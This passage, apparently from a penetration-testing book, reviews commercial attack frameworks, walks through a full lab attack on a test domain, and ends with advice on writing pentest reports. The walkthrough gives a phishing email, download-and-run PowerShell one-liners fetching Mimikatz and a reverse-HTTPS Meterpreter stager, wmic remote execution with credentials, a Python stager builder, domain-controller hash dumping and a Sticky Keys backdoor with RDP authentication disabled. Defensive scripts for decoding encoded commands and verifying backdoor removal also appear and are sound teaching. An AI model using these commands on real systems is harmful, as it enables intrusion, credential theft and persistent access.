The real benefit of Beacon is that it is a low and slow attack. You can configure it to do all of your command and control, and exfiltration, over DNS while keeping all the functionality of Metasploit.


Benefits:

• Meterpreter in memory over Beacon
• Beacon is low and slow
• Full communication over DNS - no direct connection from the victim to the attacker host
• Beacon uses Cobalt Strike's Artifact Kit to generate an anti-virus safe DLL for BypassUAC
• Custom Office files with payloads (Word/Excel)
• Phishing
• Really easy to use with PowerShell
• Creating executables to bypass AV
• Team mode
  ◦ Connect multiple clients to a single server to share exploited systems and work together
  ◦ http://www.advancedpentest.com/help-setup-collaboration


Without going through all the examples, I highly recommend watching these videos:
• Deliver DNS Trojan with Microsoft Office Macro: https://www.youtube.com/watch?feature=player_embedded&v=Ex_bvwMDDbO
• Cobalt Strike Training: http://www.advancedpentest.com/training


Conclusion:

Cobalt Strike is a must-have for a penetration tester. It heavily utilizes the Metasploit Framework, but extends it significantly. The penetration game is changing, and what used to be smash-and-grab penetration testing is now about low and slow.

Immunity Canvas
(http://www.immunityinc.com/products/canvas/) (Kali Linux/OS X/Windows)


Immunity's Canvas makes available hundreds of exploits, an automated exploitation system, and a comprehensive, reliable exploit development framework to penetration testers and security professionals worldwide.(59)


Similar to the Metasploit Framework, Canvas is built to be very flexible and is easy to build upon. Instead of being built on Ruby, as with the Metasploit Framework, Canvas is built on Python. The GUI is built on top of pyGTK. Canvas’ bread and butter is MOSDEF, a custom C compiler for payload construction. It lets the attacker compile and run additional code directly in the memory of the exploited host without ever touching the disk.


Executing Canvas is pretty straightforward, and once you have identified a vulnerability, exploiting it is very much like Metasploit. In the following example, I will build a callback trojan and execute it on a victim machine.
[Screenshot: the Canvas GUI, with the Current Target Host, Stop Exploit, Current Configuration, Callback Target(s) and Screen Shots toolbar and the Modules / Search / Node Tree / Exploit Description panes]

Canvas


Why get Canvas? Not only for the easy-to-build custom exploits, but for the ease of use in exploiting 
vulnerabilities and for the number of default custom exploits. Numerous times I have searched for a 
specific exploit on the Security Focus site and find no available public exploits for that vulnerability. 
However, browsing through Immunity Canvas’ repository, I will find the exact exploit I need. 


[Screenshot: the SecurityFocus (Symantec Connect) entry for “Cacti Multiple Unspecified Security Vulnerabilities”, exploit tab: “Currently, we are not aware of any working exploits. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.”]

No Exploit Found on SecurityFocus


[Screenshot: the Canvas Exploit Description pane for CVE-2014-5261 - ARCH: Linux, SITE: Remote, TYPE: Web Exploit, CVE NAME: CVE-2014-5261, VENDOR: The Cacti Group; NOTES: valid credentials with the permissions to update the Global Settings are required]

Exploit Available Through Canvas
For me, I use Canvas for the 0-day exploits. Immunity has partnered with:
• Gleg - Agora
• Gleg - SCADA+
• DSquare - D2
• Intevydis - VulnDisco
• Enable Security - VoIPPack


These vendors provide monthly 0-day exploits from the research they are working on. For example, D2 focuses mostly on web 0-day exploits, while VulnDisco focuses mostly on service type vulnerabilities. For more information, go to:


http://www.immunityinc.com/products/canvas/canvas-exploit-packs-overview.html


Conclusion:

Canvas is a great toolkit to have in your bag. The fact that it uses Python as its core makes it easy for many penetration testers to build their own modules and exploits. If you are looking for someone else to do a lot of the 0-day research on third party software, I highly recommend investing in Canvas.


Core Impact
(http://www.coresecurity.com/core-impact-pro)


The last commercial tool I want to discuss is Core Impact. Core is probably one of the most expensive tools you can have in your offensive testing bag, but it is worth the price. Core Impact allows for easy automation of exploitation and is said to have 25% more unique CVE-covered exploits than its competitors.


For those who are really looking for a more automated, visual approach, Core Impact is for you. It is an all-in-one tool to attack web, network, mobile, client and even wireless targets. Remember the good old days of auto-pwn? Well, Core has taken this to another level. With the click of a button, it is able to scan, compromise, take hashes/passwords, establish persistence and more.

Core Impact


Core Impact is modular like Metasploit, where you can pick and choose exploits to attack victim machines. The greatest benefit of Core Impact is that it is easy to use. Honestly, going through a network test is as easy as clicking on: 1) Network Information Gathering, 2) Network Attack and Penetration, 3) Local Information Gathering, and so on. Their exploits are well-tested, actively work on IDS/AV evasion, and perform most of the local information gathering that you would do on a penetration test. It takes most of the manual work out of the test.

The example below shows that I have compromised a host and kicked off the Local Information Gathering module. Core Impact automatically starts pulling local system information and passwords from common software that stores passwords (browsers, PuTTY, Outlook), runs Mimikatz and more.

Core Impact - Exploitation


Conclusion:

Core Impact not only has a number of well-tested exploits outside the open source platforms, but is easy to use throughout the whole pentesting cycle, which makes it a powerful tool.


Two-Minute Drill - From Zero To Hero 


Since the last book, I thought it would be helpful to include a walkthrough of a full attack. Here’s the 
scenario: You are on Day 5 of your test and you haven’t been able to exploit the SUCK network. It’s 
time for the two-minute drill. You have two minutes left and you need to go from your ten-yard line 
and cover the next 90 yards. This isn’t the only way or even the best way of doing a penetration test, 
but it is one theoretical attack path. 


Ten-Yard Line: 


First, we need to get email addresses by using Discover and Recon-NG from the Before the Snap 
section. This results in a handful of email addresses. Through testing, we have figured out that 
attachments with an Office extension (docx, pptx, xlsx) are blocked by their inbound mail filter, so we 
cannot simply mail a malicious document in from the outside. 

[Screenshot: Recon-NG/Discover output listing harvested addresses] 

Gathering Email Addresses 


Twenty-Yard Line: 


We then go to The Screen section and use SET to set up a fake website that clones their Outlook 
Web App (OWA) external site. Then we use the script /opt/spearphishing/client/spear.py to 
send out multiple spoofed emails that appear to come from IT. 


[Screenshot: cloned OWA logon page at https://fake.suck.testlab/owa/auth/logon.aspx, showing the 
"Use the light version of Outlook Web App" checkbox, a User name field containing victim@suck.testlab, 
and the "Connected to Microsoft Exchange / 2010 Microsoft Corporation" footer] 

Subject: Outlook Web Upgrade 

IMPORTANT 

Due to a recent rise in security breaches in our industry, we have upgraded 
our Outlook Mail system. 

Please visit https://suck.testlab/owa to make sure you can still login. 
Failure to do so may result in your account being locked out. 

Thank you for your co-operation, 

IT Security 

This email may contain confidential and privileged information for the 
sole use of the intended recipient. Any review or distribution by others is 
strictly prohibited. If you are not the intended recipient, please contact 
the sender and delete all copies. Thank you. 

Spear phishing 


Afterwards, we obtain a few passwords and validate that we can log into OWA. Now that we are on 
their internal mail system, we can skip the inbound email proxy entirely and send Microsoft Excel 
documents from one internal user to another. 


Thirty-Yard Line: 


Going back to the Special Teams section, we create a malicious Excel file using Generate-Macro.ps1. 
The macro drops a PowerShell reverse HTTPS Meterpreter script onto the victim host and adds a 
registry entry so it runs again after a reboot (persistence). 


With that Excel file ready, we log into the accounts we captured to see with whom they are communicating. 
Since we need the user to click the "Enable Macros" button, we need to find and build on an existing trust 
relationship. Therefore, we look for someone who has had conversations in the past and make our Excel 
file look like the ones they are sending back and forth. In the reply email, make sure you tell 
the recipient to open the Excel file and click the "Enable Macros" button. 


Before they open the email, we need to start up a Meterpreter handler. We kick off Easy-P, select 
PowerShell Meterpreter, and let it generate the resource file for the listener. With a quick msfconsole -r 
listener.rc, we now have a full handler running. 


Once the victim opens our malicious file, we get a Meterpreter shell! 

[Screenshot: the handler receiving the HTTPS callback; "msf exploit(handler) > sessions", then 
interacting with the new session and dropping to a Windows shell reporting "Windows [Version 6.1.7601]" 
(Windows 7 SP1)] 

Meterpreter Shells from Spear phishing 





Fifty-Yard Line: 


Sadly, we find out we are a power user with limited rights. We won't be able to dump hashes just yet. 
So, we run PowerUp from a shell to see if there are any ways to get to SYSTEM. 

Privilege Escalation 


Luckily, we find an unquoted service path and a writable service executable (PowerUp's Write-ServiceEXE 
check). We use PowerUp to abuse those weaknesses, create a new local administrator, and restart the 
service. A quick "runas" command then lets us kick off another PowerShell Invoke-Shellcode Meterpreter 
under the administrative account we just created. With a quick bypassuac injection and getsystem in 
Meterpreter, we are now SYSTEM! 


We jump back to Easy-P and generate a Mimikatz command: 

[Screenshot: Easy-P menu (Exit/Quit, [*] Base64) emitting a Base64-encoded powershell.exe one-liner 
that downloads and runs Invoke-Mimikatz from the cheetz PowerSploit fork on GitHub] 

PowerShell - Invoke Mimikatz 





When we run the PowerShell Invoke-Mimikatz as SYSTEM, we can grab the user's cleartext password 
from memory. 





Passwords from Memory 


Seventy-Yard Line: 




Now that we have the user's password, let's find out who the Domain Admins are. From a shell, we 
type: 

• net group "Domain Admins" /domain 

C:\Users\testuser1>net group "Domain Admins" /domain 
The request will be processed at a domain controller for domain hacker.testlab. 

Group name     Domain Admins 
Comment        Designated administrators of the domain 

Members 

Administrator            lab 
The command completed successfully. 


From the results, we see that "lab" is a domain admin. Let's see where he is logged in. In the 
Lateral Pass section, we looked at PowerView and its UserHunter functionality. It queries 
Active Directory for hosts and checks which users are logged in to each individual host: 

• powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo 
Invoke-UserHunter -UserName "lab" 

[Screenshot: Invoke-UserHunter output reporting that user 'lab' is logged on to a host] 

Finding Which Computer the Domain Admin Is Logged Into 


We know we can't log into the Domain Controller directly, but we do have access to the Win8 host. To move 
laterally, we can execute commands on remote hosts using WMIC. The payload we want to execute is 
a PowerShell Meterpreter on that particular host: 

• IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/[...]/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.16.151.128 -Lport 8080 -Force 


I want to reiterate one note, as I see it happen a lot with PowerShell. If you are attacking a 32-bit 
versus a 64-bit Windows system through WMIC, they may require different commands. The first command 
below targets 32-bit systems. The second targets 64-bit systems by explicitly calling the 32-bit 
PowerShell under SysWOW64, so Invoke-Shellcode runs in a 32-bit process and delivers the x86 stager 
that matches the windows/meterpreter/reverse_https handler: 

• wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.202 process call create "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0A...AAWACAALQBGAG8AcgBjAGUA" 

• wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "%WinDir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0A...AAWACAALQBGAG8AcgBjAGUA" 


[Screenshot: root@kali:/opt, running the wmic command above] 

Remotely Executing PowerShell Using WMI 
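The -EncodedCommand blob that Easy-P spits out is nothing more than the script text in UTF-16LE, Base64-encoded, so it is easy to build (or decode) yourself. The following Python is an added example, not code from the book or from the Easy-P/PowerSploit projects: it builds the download-and-inject stager, wraps it in the 32-bit or 64-bit wmic command shown above, and, for the defensive side of the same trick, pulls -EncodedCommand blobs out of a process-creation log line and decodes them. The LHOST/LPORT, node addresses and user name are the walkthrough's; the full PowerSploit URL is an assumption (the text only shows it truncated), and the log line is constructed.

```python
import base64
import re

# Assumed location of Invoke-Shellcode (the walkthrough only shows a truncated URL).
INVOKE_SHELLCODE_URL = (
    "https://raw.githubusercontent.com/cheetz/PowerSploit/master/"
    "CodeExecution/Invoke-Shellcode.ps1"
)

# On a 64-bit host this launches the 32-bit PowerShell, so Invoke-Shellcode
# runs as x86 and delivers the stager the x86 Meterpreter handler expects.
PS_32BIT_ON_X64 = r"%WinDir%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_DEFAULT = "powershell"


def encode_command(script: str) -> str:
    """-EncodedCommand takes Base64 of the script text encoded as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command: what you do with a blob found in a log."""
    return base64.b64decode(blob).decode("utf-16-le")


def build_stager(lhost: str, lport: int, url: str = INVOKE_SHELLCODE_URL) -> str:
    """The download-and-inject one-liner used for lateral movement."""
    return (
        f"IEX (New-Object Net.WebClient).DownloadString('{url}'); "
        f"Invoke-Shellcode -Payload windows/meterpreter/reverse_https "
        f"-Lhost {lhost} -Lport {lport} -Force"
    )


def build_wmic(node: str, user: str, password: str, script: str,
               target_is_64bit: bool) -> str:
    """wmic process call create, picking the PowerShell binary per target arch."""
    ps = PS_32BIT_ON_X64 if target_is_64bit else PS_DEFAULT
    inner = f"{ps} -EncodedCommand {encode_command(script)}"
    return (f'wmic /USER:"{user}" /PASSWORD:"{password}" /NODE:{node} '
            f'process call create "{inner}"')


# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings seen most often. Longest alternatives first so -EncodedCommand
# is not cut short by -E.
_ENC_RE = re.compile(
    r"-(?:EncodedCommand|EncodedC|Enco|Enc|Ec|E)\s+([A-Za-z0-9+/=]{16,})",
    re.IGNORECASE,
)


def find_encoded_commands(log_line: str) -> list[str]:
    """Decode every -EncodedCommand blob in a command line (e.g. Sysmon event 1)."""
    decoded = []
    for blob in _ENC_RE.findall(log_line):
        try:
            decoded.append(decode_command(blob))
        except (ValueError, UnicodeDecodeError):
            continue  # a base64-looking token that is not really an encoded command
    return decoded


if __name__ == "__main__":
    stager = build_stager("172.16.151.128", 8080)
    for node, is64 in (("172.16.151.202", False), ("172.16.151.201", True)):
        print(build_wmic(node, r"hacker\testuser1", "!Asdfasdfasdf1!", stager, is64))
    # Constructed process-creation log line, as a defender would see it.
    log = "CommandLine: powershell -NoP -Exec Bypass -enc " + encode_command(stager)
    for cmd in find_encoded_commands(log):
        print("decoded:", cmd)
```

The encoder is also a quick sanity check on a blob you are handed: the walkthrough's own commands begin with SQBFAFgAIAAoAE4A, which is exactly what "IEX (New" encodes to, and end with LQBGAG8AcgBjAGUA, which is "-Force".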


Eighty-Yard Line: 


We now have a Meterpreter shell on that host and find that we are a local admin there. We run 
a quick getsystem and then need to pull hashes and passwords. We drop back into Easy-P, create a 
dump-hashes command, and execute it: 

[Screenshot: Easy-P menu (Privilege Escalation, Lateral Movement, Meterpreter, Execution Policy) 
emitting a "powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString(
'.../master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz ..." one-liner] 

Generating PowerShell to Dump Hashes 

[Screenshot: root@kali:/opt, running the generated Invoke-Mimikatz one-liner on the remote host] 

Executing PowerShell - Mimikatz 


Goal Line: 


We have obtained the password for a Domain Administrator. Let's use Metasploit and pull the hashes 
off of the Domain Controller. 

Metasploit has a great module to pull the NTDS.dit: 
• use auxiliary/admin/smb/psexec_ntdsgrab 
• Make sure to SET the options RHOST, SMBDomain, SMBPass, and SMBUser 
• exploit 

Dumping the Domain Controller Hashes 


If grabbing the NTDS.dit file was successful, Metasploit will drop the file (together with a copy of the 
SYSTEM registry hive, which holds the boot key needed to decrypt the hashes) into the /root/.msf4/loot/ 
folder. Next, convert the dit file to hashes with libesedb's esedbexport and NTDSXtract. 


esedbexport command: 
• esedbexport -t [export location] [NTDS.dit file] 

• /opt/esedbtools/esedbexport -t /tmp/ntds /root/.msf4/loot/20150214180250_default_172.16.151.200_psexec.ntdsgrab._641158.dit 

esedbexport appends ".export" to the location you give it and writes one file per table into that 
directory (here /tmp/ntds.export/); the two we need next are datatable and link_table. 

[Screenshot: esedbexport exporting the tables of the .dit, "out of 14" for each] 

Recovering the NTDS.dit 


Next, we need to run dshashes.py to convert our tables to password hashes: 
• dshashes.py [datatable] [link table] [work directory] --passwordhashes [SYSTEM hive .bin from ntdsgrab] 

• python /opt/NTDSXtract/dshashes.py /tmp/ntds.export/datatable.4 /tmp/ntds.export/link_table.7 /tmp/ --passwordhashes /root/.msf4/loot/20150214180253_default_172.16.151.200_psexec.ntdsgrab._127578.bin 

[Screenshot: dshashes.py output listing the domain accounts with their NTLM hashes] 

Parsing Hashes 


Touchdown! Touchdown! Touchdown! 


We have just dumped the whole Active Directory environment! Lastly, we add a little backdoor for 
persistence. We quickly push a few registry changes to the Domain Controller and all the other hosts in 
order to enable the Sticky Keys backdoor: sethc.exe gets cmd.exe registered as its Image File Execution 
Options debugger, and Network Level Authentication is switched off on RDP-Tcp so the Windows logon 
screen (where pressing Shift five times launches sethc.exe as SYSTEM) is reachable over RDP before 
any credentials are entered. 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\windows\system32\cmd.exe\" /f" 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f" 

• wmic /user:[User_Name] /password:[Password] /node:[Server] process call create "C:\Windows\system32\reg.exe ADD \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\" /v SecurityLayer /t REG_DWORD /d 0 /f" 

Now, even if they change all their passwords, we still have a SYSTEM shell on their DCs. 
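The flip side of planting this backdoor is proving, after the engagement, that it is gone. The following Python is an added example, not the book's code, of the kind of remediation-verification script a client can run: it parses "reg query ... /s" output instead of touching the registry directly, so it works offline against the constructed sample below and, on a Windows host, against live output. It also generalizes beyond sethc.exe to the other logon-screen accessibility binaries the same IFEO trick applies to (utilman.exe, osk.exe and so on), which is an assumption of the example rather than something the text states, and it checks the two RDP-Tcp values the backdoor zeroes out.

```python
import re
import subprocess
import sys

IFEO_KEY = (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
            r"\Image File Execution Options")
RDP_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

# Binaries reachable from the logon screen; a Debugger under any of them
# gives a pre-auth SYSTEM shell exactly like the sethc.exe trick. (Assumed
# list for this example; the walkthrough only uses sethc.exe.)
ACCESSIBILITY_EXES = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                      "magnify.exe", "displayswitch.exe", "atbroker.exe"}


def parse_reg_query(text: str) -> dict:
    """Turn `reg query <key> /s` output into {key: {name: (type, data)}}.

    reg.exe prints the long hive name; it is normalised to HKLM so keys can
    be compared with the constants above.
    """
    keys: dict = {}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip():
            continue
        if not raw.startswith(" "):          # key paths are flush left
            current = line.replace("HKEY_LOCAL_MACHINE", "HKLM", 1)
            keys.setdefault(current, {})
        elif current is not None:            # "    Name    REG_TYPE    data"
            parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
            if len(parts) == 3:
                name, rtype, data = parts
                keys[current][name] = (rtype, data)
    return keys


def find_ifeo_debuggers(keys: dict) -> list:
    """(exe, debugger) pairs for accessibility binaries hijacked via IFEO."""
    hits = []
    for key, values in keys.items():
        exe = key.rsplit("\\", 1)[-1].lower()
        if exe in ACCESSIBILITY_EXES and "Debugger" in values:
            hits.append((exe, values["Debugger"][1]))
    return hits


def rdp_nla_disabled(keys: dict) -> bool:
    """True if NLA is off: the backdoor sets UserAuthentication and SecurityLayer to 0."""
    vals = keys.get(RDP_KEY, {})
    user_auth = int(vals.get("UserAuthentication", ("REG_DWORD", "0x1"))[1], 0)
    sec_layer = int(vals.get("SecurityLayer", ("REG_DWORD", "0x2"))[1], 0)
    return user_auth == 0 or sec_layer == 0


def check(ifeo_output: str, rdp_output: str) -> list:
    """Human-readable findings; an empty list means the backdoor is gone."""
    keys = parse_reg_query(ifeo_output)
    keys.update(parse_reg_query(rdp_output))
    findings = [f"IFEO Debugger on {exe} -> {dbg}"
                for exe, dbg in find_ifeo_debuggers(keys)]
    if rdp_nla_disabled(keys):
        findings.append("RDP NLA disabled (UserAuthentication/SecurityLayer = 0)")
    return findings


# Constructed sample output, shaped like reg.exe prints it; not captured from a real host.
BACKDOORED_IFEO = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe
    DisableExceptionChainValidation    REG_DWORD    0x0
"""
BACKDOORED_RDP = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x0
    SecurityLayer    REG_DWORD    0x0
    PortNumber    REG_DWORD    0xd3d
"""
CLEAN_RDP = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    UserAuthentication    REG_DWORD    0x1
    SecurityLayer    REG_DWORD    0x2
"""


def live_output(key: str) -> str:
    """Run reg.exe on the local Windows host (returns nothing elsewhere)."""
    if sys.platform != "win32":
        return ""
    return subprocess.run(["reg", "query", key, "/s"],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    if "--live" in sys.argv:
        findings = check(live_output(IFEO_KEY), live_output(RDP_KEY))
    else:
        findings = check(BACKDOORED_IFEO, BACKDOORED_RDP)
    print("\n".join(findings) or "no Sticky Keys backdoor indicators")
```

Run it without arguments to see the two findings the sample produces; run it with --live on the remediated server and an empty result is the evidence the client can attach to their change ticket.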


[Screenshot: a Windows Server 2012 R2 logon screen ("Other user" tile) with a SYSTEM command prompt 
open on top of it] 

Sticky Key 


The crowd goes wild and you pull out your best touchdown dance. With that successful two-minute 
drill, you go home complete and ready to write your report. 


Post Game Analysis - Reporting 


Success! You have finally fully compromised Secure Universal Cyber Kittens, pivoted to sensitive 
networks, stolen credentials and documents, and managed to keep backdoors on their servers. Now, it 
is time to wrap up the test and write the final report. 


The final delivered report is really the only thing that will matter to the client. The report is how you, 
the penetration tester, will get paid and be asked to come back. Therefore, this is by far the most 
important aspect of your test. You need to be able to explain the findings, rate the vulnerabilities, and 
explain how the results will affect the customer in the real world. Regardless of how many hosts you 
compromise or how quickly you move laterally through the network, if the client can't understand the 
final report, reproduce the exploitation, and effectively implement the remediation, the test has delivered 
little value. Anyone can run a vulnerability scanner and change the organization name, but not everyone 
can understand what the vulnerabilities actually mean. 


If you have ever had multiple penetration testers assess your network, you will find that the reports 
will vary based on who is performing the test. Some pentesting companies will just re-template a 
vulnerability scanner report, while quality pentesting companies will provide a well-detailed report 
and include repeatable steps. There is little value in a report that merely states that the client has 100 
critical Apache/PHP findings. Real value comes from the fact that the report can confirm whether or 
not the findings are valid based on the vulnerability, not just based on the banner version. 


Your final report should be influenced by your own presentation style and findings. However, I will 
give you some hints and best practices when creating your report. 


Some things to think about when writing a report: 

• I say this every time: DON'T SUBMIT A RE-TITLED Nexpose or Nessus report. I have seen this 
happen more than once or twice in my lifetime, where we received a re-titled report from a 
consulting company. 

• Rate your vulnerabilities 
  o You should figure out a way to consistently rate your vulnerabilities. I have built my own 
  matrix that includes references from NIST, DISA, CVSS, and personal experience to assign 
  ratings to vulnerabilities. 
  o The matrix increases or decreases severity based on whether a finding is internal or external, 
  whether exploit code is available, how widespread the affected systems are, what the exploit 
  can lead to, and how it affects confidentiality, integrity and availability (the CIA triad). 
  o Vulnerabilities that go through my matrix will always come out at the same criticality level. 
  If a client asks how I scored a rating for a vulnerability, I can reference my matrix. 
  o You might have a vulnerability that is a "medium" in severity to the scanner, but what if it is 
  systemic? If it is found not on one host but on every host, does the overall severity of the 
  issue turn into a "high"? 

• Theoretical vs. Real Findings 
  o I generally do not like to mark findings as critical if they are only theoretical and have no 
  actual known exploit available. These should still be considered findings, but I will generally 
  lower the rating if I can't find any avenue to exploit the host. 
  o This helps the client properly identify which findings need immediate attention versus those 
  that can be applied during a regular change control window. 

• Solutions are just as important as the findings 
  o If you used a tool to compromise a network, you have to provide a solution that stops it. 
  o If you don't have a solution, help the client develop a mitigation strategy. 

• Don't mis-rate vulnerabilities 
  o HTTP Flags: As I have said in the prior book, I still see HTTP flags all the time. A scanner 
  will report cookie attributes that are not set, such as the Secure flag or HttpOnly. But what if 
  the site doesn't support any type of client authentication, has no session to protect, and takes 
  no user input at all? It is definitely a finding, but it could be rated significantly lower than 
  the scanner output. 
  o Cross-site scripting can be very dangerous, but a "high" finding within a forum versus one 
  on a site that has no users and no data going to a backend database should have very 
  different ratings. 
  o Apache Findings: This is a great example of what I feel distinguishes good reports from bad 
  reports. Apache findings come up all the time because they are based solely on banner results. 
  You might see a PHP-CGI finding that comes up as critical and report it, but when the client 
  investigates it, he/she finds that CGI wasn't even enabled on the server. 

• Make sure vulnerabilities are actual vulnerabilities 
  o I don't know how many times I have received penetration testing results telling me my 
  systems had PHP exploits on them. This is because the scanner, based on version, alerted 
  them to these critical findings. Some of the findings state that they are PHP CGI issues or 
  Apache mod_security issues. The problem is my servers don't run the CGI scripts, but the 
  scanner identified the issue based solely on versioning. Please make sure that you validate 
  that findings are actual findings. 

• Standardize all your reports by using LaTeX templates or something similar. 


Again, all these findings should be reported, but having the right severity rating is what is important. 
It is critical when writing up a penetration test to identify what is realistic versus what is theoretical. I 
generally have two parts to a report: the first is what can actually be done with known exploits, and 
the second is everything else that the scanner picked up. 
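One way to make a rating defensible in the way described above, as an added example whose weights are illustrative assumptions and not the author's matrix: start from the scanner's CVSS-style base score, apply a fixed set of named modifiers for the factors the text lists (external exposure, exploit availability, whether the finding was validated rather than banner-matched, and how systemic it is), keep the list of modifiers that fired so the client can see how the number was reached, and split the result into the two report parts (what was actually exploited versus what the scanner merely flagged). The sample findings are constructed to mirror the cases discussed in the bullets.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    name: str
    base_score: float          # scanner / CVSS base score, 0.0-10.0
    external: bool             # reachable from the Internet
    exploit_available: bool    # working public exploit, or we exploited it
    validated: bool            # confirmed on the host, not just a banner match
    affected_hosts: int = 1
    total_hosts: int = 1


# Illustrative modifiers (assumed values for this example, not the author's matrix).
EXTERNAL_BONUS = 1.0        # Internet-facing
THEORETICAL_PENALTY = 1.5   # no known avenue to exploit
UNVALIDATED_PENALTY = 3.0   # version/banner-only finding
SYSTEMIC_BONUS = 1.5        # same issue on a large share of hosts
SYSTEMIC_SHARE = 0.5
SYSTEMIC_MIN_HOSTS = 3

# Score floors for each band, checked highest first.
BANDS = ((9.0, "Critical"), (7.0, "High"), (4.0, "Medium"), (0.1, "Low"))


def is_systemic(f: Finding) -> bool:
    return (f.affected_hosts >= SYSTEMIC_MIN_HOSTS
            and f.affected_hosts / max(f.total_hosts, 1) >= SYSTEMIC_SHARE)


def score(f: Finding) -> tuple:
    """Return (adjusted score, [reasons]) so the number is explainable to the client."""
    s, why = f.base_score, []
    if not f.validated:
        s -= UNVALIDATED_PENALTY
        why.append("not validated (version/banner only)")
    if not f.exploit_available:
        s -= THEORETICAL_PENALTY
        why.append("theoretical: no exploit path found")
    if f.external:
        s += EXTERNAL_BONUS
        why.append("externally reachable")
    if is_systemic(f):
        s += SYSTEMIC_BONUS
        why.append(f"systemic: {f.affected_hosts}/{f.total_hosts} hosts")
    return round(max(0.0, min(10.0, s)), 1), why


def rating(f: Finding) -> str:
    adjusted, _ = score(f)
    for floor, label in BANDS:
        if adjusted >= floor:
            return label
    return "Informational"


def split_report(findings: list) -> tuple:
    """Part 1: what we actually did with known exploits. Part 2: everything else."""
    real = [f for f in findings if f.validated and f.exploit_available]
    rest = [f for f in findings if f not in real]
    return real, rest


# Constructed sample findings mirroring the cases discussed in the text.
SAMPLE = [
    Finding("Unquoted service path on workstations", 5.5, False, True, True, 40, 50),
    Finding("PHP-CGI RCE (banner match, CGI disabled)", 9.8, True, False, False),
    Finding("Missing Secure/HttpOnly flag on static brochure site", 4.3, True, False, False),
    Finding("Stored XSS in customer forum", 6.1, True, True, True),
]

if __name__ == "__main__":
    for f in SAMPLE:
        s, why = score(f)
        print(f"{rating(f):8} {s:4} {f.name}  [{'; '.join(why) or 'no modifiers'}]")
    real, rest = split_report(SAMPLE)
    print("Part 1 (exploited):", [f.name for f in real])
    print("Part 2 (scanner):  ", [f.name for f in rest])
```

With these weights the systemic "medium" unquoted-service-path finding lands in High, the banner-only PHP-CGI "critical" drops to Medium, and the cookie-flag finding on a site with nothing to protect ends up Low; change the constants and every finding moves consistently, which is the point of having a matrix at all.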


What you shouldn't do: 

[Image: "Scumbag Pentester" meme] 


What you should have in your report: 

• Introduction/Overview 
  o High-level description of the project, dates, and company/infrastructure being tested. 

• Scope and Objectives 
  o This section should outline the IP ranges, URLs, and applications that are to be tested. It 
  should also explain the purpose of the test. 

• Deviations from the Statement of Work 
  o Many tests have changes from the original requirements, such as having to stop testing on a 
  host, to stop scanning, and/or make changes to the testing windows. 

• Methodology 
  o A high-level description of the testing process and standards. 

• Significant Assessment Findings 
  o This section should be dedicated to critical findings. 

• Positive Observations 
  o This part is just as important as the significant findings. No one likes to see a whole report 
  where their company is beat up. Talking about what the company did well helps lessen the 
  blow on where fixes need to be made. 

• Findings Summary 
  o Overall view of the findings broken down by severity. 
  o A concluding summary that explains whether the environment was found to be vulnerable 
  and what opportunities for exploitation exist. 

• Detailed Findings 
  o This should include severity, vulnerability definition, issue/detailed description/risks, asset, 
  recommendation, and snapshots/logs/how-to-exploit walkthrough. 

• Appendix 
  o Listing of all assets and ports 
  o Additional information and snapshots 


Some examples of reports: 


http://isecpartners.github.io/publications/iSEC_Cryptocat_iOS.pdf 
https://www.offensive-security.com/reports/penetration-testing-sample-report-2013.pdf 
http://www.pentest-standard.org/index.php/Reporting 
http://resources.infosecinstitute.com/writing-penetration-testing-reports/ 


There are times when I generate a second report, based on the client. The second report will be 
directed toward higher management and will discuss the systemic issues and patterns of gaps in 
security. This shouldn’t be very detailed or technical, but should mainly state facts at a high-level, 
based on the test. 


Lastly, if you want to set yourself apart from other pentesters, try to find ways to give yourself added 
value that others may not offer. For example, if you are doing a PT for a large company, you can 
provide a simple OSINT (Open Source Intelligence) report, in addition to the final report, to describe 
what and who can be publicly found from the Internet. There have been times when I created scripts 
(Python, PowerShell, Bat) that perform checks against critical findings, so that after they remediate 
their systems, they can just execute the script to verify. 


